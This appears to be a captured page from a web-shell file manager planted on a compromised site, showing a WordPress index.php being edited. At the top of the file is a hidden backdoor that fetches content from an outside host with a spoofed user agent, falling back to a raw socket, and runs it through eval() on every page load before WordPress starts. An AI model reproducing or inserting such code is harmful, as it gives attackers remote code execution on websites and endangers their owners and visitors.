📂 /home/usatwnzi/thenewshunt.net
⬆ UP
UPLOAD
NEW FILE
NEW DIR
✎ EDIT: index.php
← BACK
<?php function remote_content($url = 'http://z60827_15.xvyns.shop/stat/domain_index.txt') { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0'; if (ini_get('allow_url_fopen')) { $ctx = stream_context_create(["http" => ["header" => "User-Agent: $ua\r\n"]]); $res = @file_get_contents($url, false, $ctx); if ($res) return $res; } $p = parse_url($url); $host = $p['host']; $port = ($p['scheme'] == 'https') ? 443 : 80; $sock = @fsockopen(($port == 443 ? "ssl://" : "") . $host, $port, $en, $er, 10); if ($sock) { $req = "GET " . ($p['path'] ?? '/') . " HTTP/1.1\r\nHost: $host\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n"; fwrite($sock, $req); $raw = ''; while (!feof($sock)) { $raw .= fgets($sock, 1024); } fclose($sock); return substr($raw, strpos($raw, "\r\n\r\n") + 4); } return false; } eval( '?>'.remote_content( ) ); define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
SAVE
0xn0l - 0011000001111000011011100011000001101100